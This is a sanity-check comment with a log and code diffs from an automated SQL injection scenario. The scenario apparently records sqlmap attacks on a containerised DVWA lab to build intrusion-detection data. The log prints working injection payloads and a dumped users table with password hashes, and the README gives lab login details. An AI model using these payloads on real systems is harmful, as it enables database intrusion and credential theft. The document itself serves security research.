Sanity Check: CWE-89-SQL-injection

Exploit funktioniert auf meinem System mit gleichen Parametern:

```
➜  CWE-89-SQL-injection git:(sanity-sql-injection) ✗ sudo python3 main.py 0 45 1
2021-08-30 13:31:17,908 - INFO - control_script - Starting normal container
2021-08-30 13:31:17,908 - INFO - control_script - Starting exploit container
2021-08-30 13:31:18,264 - INFO - control_script - Simulating Scenario: <SQLInjection wailing_franklin_1849 recording_time=45 warmup_time=3 exploit_start_time=22>
2021-08-30 13:31:18,632 - DEBUG - [VICTIM] 73e580edf64518fa - Waiting for container to be available
checking... is victim ready?
not ready yet...
checking... is victim ready?
not ready yet...
checking... is victim ready?
is ready...
2021-08-30 13:31:20,660 - INFO - [VICTIM] 73e580edf64518fa - Container available on port(s) {'80/tcp': [{'HostIp': '0.0.0.0', 'HostPort': '49153'}, {'HostIp': '::', 'HostPort': '49153'}]}
2021-08-30 13:31:20,662 - INFO - control_script - Warming up Scenario: wailing_franklin_1849
2021-08-30 13:31:23,665 - INFO - control_script - Start Normal Behaviours for Scenario: wailing_franklin_1849
2021-08-30 13:31:23,666 - DEBUG - control_script - Simulating with {}
2021-08-30 13:31:23,666 - INFO - control_script - Start Recording Scenario: wailing_franklin_1849
2021-08-30 13:31:23,666 - INFO - [VICTIM] 73e580edf64518fa - Saving to Sysdig to ./runs/wailing_franklin_1849.scap with buffer size 80
2021-08-30 13:31:23,936 - INFO - [VICTIM] 73e580edf64518fa - Writing tcpdump to ./runs/wailing_franklin_1849.pcap
2021-08-30 13:31:45,691 - INFO - [ATTACKER] 4267ded10819d6bd - Executing the exploit step attack now at 1630323105.6913674
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd -         ___
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd -        __H__
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd -  ___ ___["]_____ ___ ___  {1.5.6.3#dev}
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - |_ -| . [)]     | .'| . |
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - |___|_  [(]_|_|_|__,|  _|
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd -       |_|V...       |_|   http://sqlmap.org
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - 
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - 
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - [*] starting @ 11:31:48 /2021-08-30/
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - 
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:48] [INFO] using 'STDIN' for parsing targets list
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - URL 1:
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - GET http://73e580edf64518fa/vulnerabilities/sqli/?id=1&Submit=Submit
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - Cookie: security=low; PHPSESSID=4nb9iijdk6gfc7d7necc4v1ca6
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - do you want to test this URL? [Y/n/q]
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - > Y
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:48] [INFO] testing URL 'http://73e580edf64518fa/vulnerabilities/sqli/?id=1&Submit=Submit'
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:48] [INFO] using '/root/.local/share/sqlmap/output/results-08302021_1131am.csv' as the CSV results file in multiple targets mode
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:48] [INFO] testing connection to the target URL
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:48] [INFO] checking if the target is protected by some kind of WAF/IPS
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:48] [INFO] testing if the target URL content is stable
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:48] [INFO] target URL content is stable
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:48] [INFO] testing if GET parameter 'id' is dynamic
2021-08-30 13:32:00,410 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:48] [WARNING] GET parameter 'id' does not appear to be dynamic
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:48] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:48] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:48] [INFO] testing for SQL injection on GET parameter 'id'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:48] [WARNING] reflective value(s) found and filtering out
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'Generic inline queries'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Me")
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'MySQL inline queries'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:59] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:59] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:59] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:59] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:59] [INFO] target URL appears to have 2 columns in query
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:59] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - [11:31:59] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - sqlmap identified the following injection point(s) with a total of 154 HTTP(s) requests:
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - ---
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - Parameter: id (GET)
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd -     Type: boolean-based blind
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd -     Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd -     Payload: id=1' OR NOT 9777=9777#&Submit=Submit
2021-08-30 13:32:00,411 - INFO - [ATTACKER] 4267ded10819d6bd - 
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd -     Type: error-based
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd -     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd -     Payload: id=1' AND (SELECT 5113 FROM(SELECT COUNT(*),CONCAT(0x716a716b71,(SELECT (ELT(5113=5113,1))),0x7170786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- KUNW&Submit=Submit
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - 
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd -     Type: time-based blind
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd -     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd -     Payload: id=1' AND (SELECT 3801 FROM (SELECT(SLEEP(5)))evvS)-- Vaph&Submit=Submit
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - 
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd -     Type: UNION query
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd -     Title: MySQL UNION query (NULL) - 2 columns
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd -     Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x716a716b71,0x5a776c45546b6e6a7268726c526e5871464c43524d68765466456f5141534f6c7a4945577851556d,0x7170786a71)#&Submit=Submit
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - ---
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - do you want to exploit this SQL injection? [Y/n] Y
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] the back-end DBMS is MySQL
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - web server operating system: Linux Debian 9 (stretch)
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - web application technology: Apache 2.4.25
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - back-end DBMS: MySQL >= 5.0 (MariaDB fork)
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] fetching database users password hashes
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [WARNING] potential permission problems detected ('command denied')
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [WARNING] the SQL query provided does not return any output
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [WARNING] the SQL query provided does not return any output
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [WARNING] the SQL query provided does not return any output
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [WARNING] the SQL query provided does not return any output
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] fetching database users
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] fetching number of password hashes for user 'app'
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - 
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] retrieved: 
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - 
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] retrieved: [11:32:00] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - 
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - 
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] retrieved: 
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - 
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] retrieved: 
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [WARNING] unable to retrieve the number of password hashes for user 'app'
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [ERROR] unable to retrieve the password hashes for the database users
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] sqlmap will dump entries of all tables from all databases now
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] fetching database names
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] fetching tables for databases: 'dvwa, information_schema'
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] skipping system databases 'information_schema, mysql, performance_schema, sys'
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] fetching columns for table 'users' in database 'dvwa'
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] fetching entries for table 'users' in database 'dvwa'
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] recognized possible password hashes in column 'password'
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - do you want to crack them via a dictionary-based attack? [y/N/q] N
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - Database: dvwa
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - Table: users
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - [5 entries]
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - +---------+-----------------------------+---------+----------------------------------+-----------+------------+---------------------+--------------+
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - | user_id | avatar                      | user    | password                         | last_name | first_name | last_login          | failed_login |
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - +---------+-----------------------------+---------+----------------------------------+-----------+------------+---------------------+--------------+
2021-08-30 13:32:00,412 - INFO - [ATTACKER] 4267ded10819d6bd - | 1       | /hackable/users/admin.jpg   | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | admin     | admin      | 2021-08-30 11:31:22 | 0            |
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - | 2       | /hackable/users/gordonb.jpg | gordonb | e99a18c428cb38d5f260853678922e03 | Brown     | Gordon     | 2021-08-30 11:31:22 | 0            |
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - | 3       | /hackable/users/1337.jpg    | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | Me        | Hack       | 2021-08-30 11:31:22 | 0            |
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - | 4       | /hackable/users/pablo.jpg   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | Picasso   | Pablo      | 2021-08-30 11:31:22 | 0            |
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - | 5       | /hackable/users/smithy.jpg  | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | Smith     | Bob        | 2021-08-30 11:31:22 | 0            |
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - +---------+-----------------------------+---------+----------------------------------+-----------+------------+---------------------+--------------+
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - 
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] table 'dvwa.users' dumped to CSV file '/root/.local/share/sqlmap/output/73e580edf64518fa/dump/dvwa/users.csv'
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] fetching columns for table 'guestbook' in database 'dvwa'
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] fetching entries for table 'guestbook' in database 'dvwa'
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - Database: dvwa
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - Table: guestbook
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - [1 entry]
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - +------------+------+-------------------------+
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - | comment_id | name | comment                 |
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - +------------+------+-------------------------+
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - | 1          | test | This is a test comment. |
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - +------------+------+-------------------------+
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - 
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] table 'dvwa.guestbook' dumped to CSV file '/root/.local/share/sqlmap/output/73e580edf64518fa/dump/dvwa/guestbook.csv'
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - [11:32:00] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-08302021_1131am.csv'
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - 
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - [*] ending @ 11:32:00 /2021-08-30/
2021-08-30 13:32:00,413 - INFO - [ATTACKER] 4267ded10819d6bd - 
2021-08-30 13:32:20,309 - INFO - control_script - Attacker already shut down
2021-08-30 13:32:20,434 - INFO - postprocessing - Starting postprocessing for attacker 172.18.0.2
2021-08-30 13:32:25,858 - INFO - collector - Optimized attack time for attack from 1630323105.6919084 to 1630323108.213886 from SYSDIG
2021-08-30 13:32:25,858 - INFO - postprocessing - Finished postprocessing
```

--- a/scenarios/CWE-89-SQL-injection/README.md
+++ b/scenarios/CWE-89-SQL-injection/README.md
@@ -24,10 +24,11 @@ Run sqlmap with cookie information to automatically inject malicious sql queries
 
 ## cli interface:
 
-    sudo python3.7 main.py a b c 
+    sudo python3.7 main.py a b c
     
-    a: boolean run automated normal behavior
+    a: boolean (0/1) run automated normal behavior
     b: integer recording time
        1-n: recording time in seconds
         -1: flag to run auto stop of recording after end of exploit
-    c: boolean run automated exploit
+    c: boolean (0/1) run automated exploit
+

--- a/scenarios/CWE-89-SQL-injection/README.md
+++ b/scenarios/CWE-89-SQL-injection/README.md
@@ -24,7 +24,7 @@ Run sqlmap with cookie information to automatically inject malicious sql queries
 
 ## cli:
 
-    sudo python3.7 main.py a b c
+    sudo python3 main.py a b c
     
     a: boolean (0/1) run automated normal behavior
     b: integer recording time

--- a/scenarios/CWE-89-SQL-injection/README.md
+++ b/scenarios/CWE-89-SQL-injection/README.md
@@ -22,7 +22,7 @@ Go through links on site and visit /vulnerabilities/sqli if available.
 Extract cookie information. 
 Run sqlmap with cookie information to automatically inject malicious sql queries.
 
-## cli interface:
+## cli:
 
     sudo python3.7 main.py a b c
     

--- a/scenarios/CWE-89-SQL-injection/README.md
+++ b/scenarios/CWE-89-SQL-injection/README.md
@@ -9,14 +9,25 @@ Running [DVWA](https://dvwa.co.uk/) with unrestricted file upload possibility.
 ## normal:
 Consists of user randomly browsing website. 
 Including following actions:
-    log_in:         Logging user with predefinded credentials.
-    log_off:        If user is logged in randomly log off.
-    follow_link:    Click random link on current site.
-    do_things:      If on /vulnerabilities/sqli  :Sending either valid or random SQL queries. 
-                        If on /vulnerabilities/upload:Create tempfile and upload it.
+- log_in:         Logging user with predefinded credentials.
+- log_off:        If user is logged in randomly log off
+- follow_link:    Click random link on current site.
+- do_things:      
+  - If on /vulnerabilities/sqli:Sending either valid or random SQL queries.
+  - If on /vulnerabilities/upload: Create tempfile and upload it.
 
 ## exploit:
 Logging in as 1337 with password charley.
 Go through links on site and visit /vulnerabilities/sqli if available.
 Extract cookie information. 
 Run sqlmap with cookie information to automatically inject malicious sql queries.
+
+## cli interface:
+
+    sudo python3.7 main.py a b c 
+    
+    a: boolean run automated normal behavior
+    b: integer recording time
+       1-n: recording time in seconds
+        -1: flag to run auto stop of recording after end of exploit
+    c: boolean run automated exploit

--- a/scenarios/CWE-89-SQL-injection/main.py
+++ b/scenarios/CWE-89-SQL-injection/main.py
@@ -35,7 +35,7 @@ class SQLInjection(Scenario):
 
 
 if __name__ == '__main__':
-    warmup_time = int(sys.argv[1])
+    do_normal = bool(int(sys.argv[1]))
     recording_time = int(sys.argv[2])
     is_exploit = int(sys.argv[3])
     do_exploit = True
@@ -54,24 +54,26 @@ if __name__ == '__main__':
                     init_args="")
     normal = Image("normal_sql",
                    command=StdinCommand(""),
-                   init_args="-ip ${victim}")
+                   init_args="-ip ${victim} -v 1")
 
-    min_user_count = 10
-    max_user_count = 25
+    min_user_count = 5
+    max_user_count = 15
     user_count = random.randint(min_user_count, max_user_count)
 
-    if recording_time == -1:
+    if not do_normal:
+        wait_times = {}
+    elif recording_time == -1:
         # 1800s = 5hrs -> normal behaviour needs to be generated for a long time until exploit ends
-        wait_times = Sampler("Aug28").ip_timerange_sampling(user_count, 1800)
+        wait_times = Sampler("Jul95").timerange_sampling(user_count, 1800)
     else:
-        wait_times = [gen_schedule_wait_times(recording_time) for _ in range(user_count)]
+        wait_times = Sampler("Jul95").timerange_sampling(user_count, recording_time)
 
     sql_scenario = SQLInjection(
         victim=victim,
         normal=normal,
         exploit=exploit,
         wait_times=wait_times,
-        warmup_time=warmup_time,
+        warmup_time=3,
         recording_time=recording_time,
         storage_services=storage_services,
         exploit_start_time=exploit_time

